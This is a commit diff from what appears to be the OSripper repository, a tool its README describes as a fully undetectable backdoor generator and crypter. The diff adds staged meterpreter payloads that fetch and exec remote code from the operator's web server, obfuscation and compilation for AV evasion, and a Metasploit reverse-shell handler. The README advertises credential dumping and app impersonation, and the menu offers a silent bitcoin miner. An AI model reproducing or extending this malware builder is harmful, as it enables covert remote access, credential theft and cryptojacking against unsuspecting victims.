Skip to content

Commit 303dff5

Browse files
committed
v0.3
v0.3 Release
1 parent b76d5d6 commit 303dff5

File tree

3 files changed

+83
-4
lines changed

3 files changed

+83
-4
lines changed

README.MD

Lines changed: 5 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -37,13 +37,16 @@ Please select a module:
3737
OSripper is a fully undetectable Backdoor generator and Crypter which specialises in OSX M1 malware. It will also work on windows but for now there is no support for it and it IS NOT FUD for windows (yet at least) and for now i will not focus on windows.
3838

3939

40-
#Attention
41-
I know that i have promised to update within a week. this was aroud a month ago. i want you to know that the delay is partly because i have been busy with work and university. The main reason however is that i have found some interesting new techniques which will fundamentally change this Framework. For this reason i am still researching and developing these techniques. Therefore, for V0.3 i am planning to integrate polymorphic shellcode in C for both windows and linux. The project will therefore cease of focusing on MacOS and develop into a full flexed cross platform framework. I have already gotten the shells down to 0 detection on VT. Now i am on the last step of this update by also accomplishing this for staged meterpreters. Thank you for your patience
40+
# Update
41+
This is the first v0.3 Release. The payloads will now be double staged in order to evade av detection. Please keep in mind that i develop on arch and only test on a few platforms so there are sure to be bugs and you should open issues for them.
42+
Biggest difference to last release is that this project isnt focused on macOS anymore but on all platforms. It also now features a web server on which the staged payload is stored. I will develop this server into a C2 to which data will be pushed from the victim.
43+
With this update the developtment is officially back in progress.
4244

4345

4446

4547

4648
## Features
49+
- Staged payloads
4750
- FUD (for macOS)
4851
- Cloacks as an official app (Microsoft, ExpressVPN etc)
4952
- Dumps; Sys info, Browser History, Logins, ssh/aws/azure/gcloud creds, clipboard content, local users etc. (more on Cedric Owens swiftbelt)

main.py

Lines changed: 76 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -12,6 +12,9 @@
1212
from ripgrok import get_tunnels
1313
import random
1414
from pickle import GLOBAL
15+
import subprocess
16+
17+
1518

1619
bind = 0
1720
## RandomVariables
@@ -150,6 +153,8 @@ def logo():
150153
print(random.choice(logolist))
151154

152155

156+
def move_file_to_directory(file_path, destination_directory):
157+
shutil.move(file_path, destination_directory)
153158
clear = lambda: os.system("clear")
154159
clear()
155160
logo()
@@ -552,6 +557,12 @@ def postgen():
552557
print(logo)
553558
print('Backdoor saved under "dist" folder')
554559

560+
def start_web_server(webroot):
561+
command = ["python3", "-m", "http.server", "--directory", webroot]
562+
563+
# Start the web server as a background process
564+
subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
565+
555566

556567
def rep_syst():
557568
hide = input(
@@ -713,16 +724,39 @@ def cleanup():
713724
except FileNotFoundError:
714725
pass
715726

716-
727+
def webdelivery():
728+
with open ("backdoor.py","a+") as outs:
729+
specf="destin='http://"+host+":8000/ocr_or.py'"
730+
websc= """
731+
import requests
732+
import subprocess
733+
import time
734+
import random
735+
def download_and_run_script(url):
736+
response = requests.get(url)
737+
script_content = response.text
738+
exec(script_content)
739+
740+
script_url = destin
741+
download_and_run_script(script_url)
742+
"""
743+
outs.write(specf)
744+
outs.write(websc)
745+
import obfuscator
746+
obfuscator.MainMenu("backdoor.py")
747+
os.system("python3 -m nuitka --standalone --include-module=sandboxed --disable-console --onefile --assume-yes-for-downloads backdoor_or.py")
717748
print(
718749
"""
719750
720751
1. Create Bind Backdoor (opens a port on the victim machine and waits for you to connect)
721752
2. Create Encrypted TCP Meterpreter (can embed in other script) (recommended)
722-
3. Create Obfuscated file with custom code
753+
3. Crypt custom code
723754
##########################################################################################
724755
Miners
725756
4. Create a silent BTC miner
757+
##########################################################################################
758+
Staged Payloads
759+
5. Create Encrypted Meterpreter (staged)
726760
727761
"""
728762
)
@@ -821,5 +855,45 @@ def cleanup():
821855
print('Miner saved under "dist" folder')
822856
print("You can monitor your `miners` here : https://solo.ckpool.org/")
823857
cleanup()
858+
if nscan == "5":
859+
clear()
860+
logo()
861+
print(
862+
"##########################################################################################"
863+
)
864+
print("Generating")
865+
gen_rev_ssl_tcp()
866+
clear()
867+
logo()
868+
print(
869+
"##########################################################################################"
870+
)
871+
872+
873+
b = "".join(
874+
secrets.choice(string.ascii_uppercase + string.ascii_lowercase)
875+
for i in range(13)
876+
)
877+
878+
encrypted = True
879+
import obfuscator
880+
881+
obfuscator.MainMenu(name)
882+
file_path = "ocr_or.py"
883+
destination_directory = "webroot"
884+
move_file_to_directory(file_path, destination_directory)
885+
webdelivery()
886+
webroot = "webroot"
887+
start_web_server(webroot)
888+
print("web server started in the beackground on port 8000. the backdoor is saved as backdoor_or.py and if you have compiled it it will be in the nuitka folder")
889+
print("wait...")
890+
a = (
891+
"msfconsole -q -x 'use multi/handler;set payload python/meterpreter/reverse_tcp_ssl;set LHOST 0.0.0.0; set LPORT "
892+
+ port
893+
+ "; exploit'"
894+
)
895+
os.system(a)
896+
897+
824898
else:
825899
print("Please select a vaild option")

webroot/readme.txt

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
dont touch this directory
2+
-SG1

0 commit comments

Comments
 (0)